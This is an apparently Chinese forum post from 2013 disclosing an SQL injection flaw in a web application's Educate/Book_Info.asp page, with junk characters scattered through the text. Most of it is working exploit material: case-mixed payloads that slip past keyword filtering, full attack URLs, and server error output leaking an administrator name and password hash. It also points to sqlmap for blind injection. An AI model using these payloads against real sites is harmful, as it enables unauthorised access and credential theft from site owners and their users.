漏洞出现在Educate/Book_Info.asp
, j9 \! p' w7 V+ y e3 ~" `: y) a
6 |2 _5 T ?# b/ p, A c2 W此处注入点虽然过滤了一些关键字 但是我们还是可以盲注的 可以利用sqlmap跑出
9 o' }% Z! s3 ~9 G , ^& U4 }" }1 i
exp:如下" h9 C0 M/ { c" `
查询管理账号:+aNd+0=(selEct+toP+1+su_SupperName+frOm+pH_Web_Supper)
! x9 E4 J: ~) Q查询管理密码:+aNd+0=(selEct+toP+1+su_Password+frOm+pH_Web_Supper)0 V! c9 R7 X/ m m6 Y I. `- A, y
( I2 `: H/ L8 t b
http://www.xxx.com /Educate/Book_Info.asp?Param=20+aNd+0=(selEct+toP+1+su_SupperName+frOm+pH_Web_Supper)
. A" c5 E2 q3 y5 S$ a# e% ` + Z) G! o A# k4 e/ R4 i( ?
Microsoft OLE DB Provider for SQL Server 错误 '80040e07'; h5 [- K. I$ e1 X+ T% ~9 u/ T
! L |. E! u I# j7 y3 k# X
将 nvarchar 值 'hackbase' 转换为数据类型为 int 的列时发生语法错误。: V$ S' r* }% }
6 i, I; v4 r8 q% u, Y
/Educate/Book_Info.asp,行 8
9 G7 g: S, r( } " v* ~( c& I7 Q0 G
http://www.xxx.com /Educate/Book_Info.asp?Param=20+aNd+0=(selEct+toP+1+su_Password+frOm+pH_Web_Supper)
7 P0 e( u/ _$ r3 H/ n
b' G2 f! I5 }9 u$ s& }Microsoft OLE DB Provider for SQL Server 错误 '80040e07') w8 y. c! H6 Y! h1 O6 y# S3 F7 z! C2 ?9 Z
2 F; I# T# K9 d1 ?' }" C9 `7 p
将 nvarchar 值 '165706AD8319D7F95B7FC5E82FBE8F' 转换为数据类型为 int 的列时发生语法错误。
( F* x- L! ]# v3 |- e 8 _, D4 ^! |/ ?" |1 K9 \: Z
/Educate/Book_Info.asp,行 8
- O3 }, u# i# `- b( y' d% ]3 V |
发表于 2013-2-16 21:44:16
收藏
支持
反对